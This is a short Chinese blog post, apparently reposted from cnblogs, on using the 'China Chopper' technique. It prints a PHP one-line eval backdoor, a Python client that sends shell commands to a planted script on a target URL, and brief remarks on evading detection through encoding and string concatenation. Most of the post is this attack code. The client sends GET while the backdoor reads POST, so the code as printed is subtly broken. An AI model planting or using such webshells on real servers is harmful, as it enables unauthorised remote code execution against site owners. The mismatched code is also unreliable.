码迷,mamicode.com
首页 > 其他好文 > 详细

关于中国菜刀,如何"切菜"

时间:2017-06-26 12:52:53      阅读:136      评论:0      收藏:0      [点我收藏+]

标签:requests   text   拼接   str   等等   需要   字符串拼接   pos   字符串   

0x00  菜

关于一句话木马肯定是眼熟能详,一句话木马如下:

<?PHP eval($_POST[w]);?>

0x01  刀

一把西瓜刀如下:

# -*-coding=utf-8-*-
# /usr/bin/python

import sys
import requests


def encodePayload(payload):
    #请尽情蹂躏payload
    return str(payload)


cmd = sys.argv[1]
payload = encodePayload(cmd)
url = "www.xxx.com/1.php?w="+ payload
req = requests.get(url)
print req.text

 

本质上算是代码注入。

0x02 如果进行绕过呢?

需要人员在满足编程语法规则上,尽情蹂躏代码。举个栗子:编码转换、字符串拼接、特殊符号等等。

博主正在想栗子...

关于中国菜刀,如何"切菜"

标签:requests   text   拼接   str   等等   需要   字符串拼接   pos   字符串   

原文地址:http://www.cnblogs.com/MiWhite/p/7079486.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!